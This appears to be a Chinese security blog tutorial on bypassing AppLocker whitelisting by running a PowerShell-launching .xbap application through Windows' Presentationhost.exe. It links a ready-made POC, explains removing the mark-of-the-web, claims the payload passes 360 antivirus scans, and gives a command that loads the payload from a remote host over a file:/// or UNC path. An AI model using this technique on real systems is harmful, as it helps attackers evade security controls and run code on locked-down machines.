當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
0x02 使用Persentationhost.exe執行payload
0x01 Persentationhost.exe介紹
Presentationhost.exe是一個內置的Windows可執行文件,用於運行XAML瀏覽器應用程序(即.xbap文件)。在多個AppLocker白名單繞過列表中,Presentationhost.exe都位列其中(例如api0cradl和milkdevil)。
當我們打開.xbap文件的時候其實不是在IE中啓動的應用程序,而是在Presentationhost.exe中運行,通常是在一個沙箱中以保護用戶免受惡意代碼的攻擊。
由於白名單加載payload的免殺測試需要結合殺軟的行爲檢測才合理,查殺白名單文件都沒有任何意義,payload文件的查殺率依賴於對payload的免殺處理,所以這裏對白名單程序的免殺效果不做評判。
0x02 使用Persentationhost.exe執行payload
創建xbap應用程序可以按照以下說明來構建自己的POC。
1.下載VS(我這裏使用的是VS2015)
2.打開VS選擇New Project創建WPF Browser Application 並創建一個新的Visual C# app
初始化新項目後你會看到如下界面。
點擊運行後,此應用程序會使用你的默認瀏覽器打開.xbap文件。如果你的默認瀏覽器不是IE,那麼需要將鏈接拷貝到IE瀏覽器去打開,打開後會彈出以下警告:
點擊運行後會出現以下界面。讓我們來創建一個簡單的UI,即在左側輸入命令右側輸出結果。此外,我還將添加一個帶有單擊事件的按鈕。
這裏可以使用這個已經編譯好的POC:https://github.com/jpginc/xbapAppWhitelistBypassPOC
在下載下來的文件中..\..\xbapAppWhitelistBypassPOC-master\xbapAppWhitelistBypassPOC-master\powershell\bin\Debug中運行powershell.xbap即可看到
要繞過默認的AppLocker規則,請將這些文件複製到鎖定的計算機,然後雙擊.xbap文件。如果你從網站下載該文件,它將無法運行,因爲它將包含Web標記。你可以通過右鍵單擊該文件,然後單擊“Unblock(取消阻止)”複選框來刪除Web標記(或者你也可以使用 Powershell)。
360靜態查殺和動態查殺通過。
如果你不想將文件複製到鎖定的計算機上,你也可以從命令行使用file:/// URI 或 UNC路徑來運行presentation host,例如:presentationhost.exe file:///ipAddressOrHostName/powershell.xbap
以下是PowerShell xbap的源碼:https://github.com/jpginc/xbapAppWhitelistBypassPOC/tree/master
參考鏈接:
使用presentationhost.exe繞過AppLocker白名單限制:https://www.freebuf.com/articles/system/188699.html
雖然我們生活在陰溝裏,但依然有人仰望星空!